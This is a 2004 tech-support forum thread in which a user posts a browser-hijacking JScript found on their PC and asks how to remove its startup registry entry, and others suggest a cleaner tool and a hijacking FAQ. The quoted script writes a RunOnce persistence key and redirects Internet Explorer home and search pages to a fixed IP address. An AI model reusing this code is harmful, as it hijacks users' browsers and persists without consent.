Forum Home
Press F1
 
Thread ID: 41897 2004-01-26 00:50:00 Pesky Script seacrest (2893) Press F1
Post ID Timestamp Content User
209974 2004-01-26 00:50:00 I have this pesky little script that keeps changing my home page
however when i delete windows tries to find it when booting my pc
how can i remove the reference to the script?
I dont know a lot about registries
Here is the script

var url = "81.211.105.43
var burl = "81.211.105.43
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update12.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");
seacrest (2893)
209975 2004-01-26 01:38:00 Try a little program called Easycleaner (www.majorgeeks.com) which can clean your registry and also change startup programs.

A word of caution though, if you get to playing with other functions, stay away from "Duplicates" and "unnecessary". They aren't the best. Everything else is quite safe.
Pheonix (280)
209976 2004-01-26 02:16:00 check out the spyware and homepage hijacking FAQ. tweak'e (174)
1